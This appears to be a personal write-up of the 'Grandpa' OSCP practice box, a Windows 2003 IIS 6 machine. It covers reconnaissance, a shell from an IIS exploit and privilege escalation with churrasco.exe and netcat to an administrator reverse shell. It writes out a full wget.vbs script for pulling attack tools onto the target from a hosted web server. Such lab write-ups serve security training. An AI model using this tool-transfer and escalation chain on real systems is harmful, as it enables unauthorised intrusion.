After a break, back to OSCP practice boxes. Starting with grandpa. Grandpa is a windows box with 2003 server installed.
Lets start with nmap
after scanning nmap we can see that IIS v6 is installed. Did try with gobuster, nothing interesting.
did a davtest to see if it was accessible. no luck on that either.
tried searching for exploit using searchsploit. The one found didn’t work well.
after googling for sometime got a script which helped to get a limited shell.
After downloading the script, renamed it to exploit.py since it was a python script. After executing the script got a shell.
Next is privilege escalation. For privilege escalation used churrasco.exe and nc.exe. Netcat exe file comes with kali so no need to download it but for churrasco you can wget from https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
after downloading the files now it’s time to transfer files to the windows box. Im gonna use a vbs script which should be familiar with the OSCP students. before that had to setup a webserver using python. python -m SimpleHTTPServer 80
For the script, can copy paste everything as it is in the command prompt.
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs
This will create a file called wget.vbs. which can be used to download the rest of the files needed for privilege escalation.
All the files were downloaded using the wget.vbs file. for the privilege escalation we have to run churrasco and nc. and also have to open a new netcat listener.
we got the administrative shell.
Hope this helps.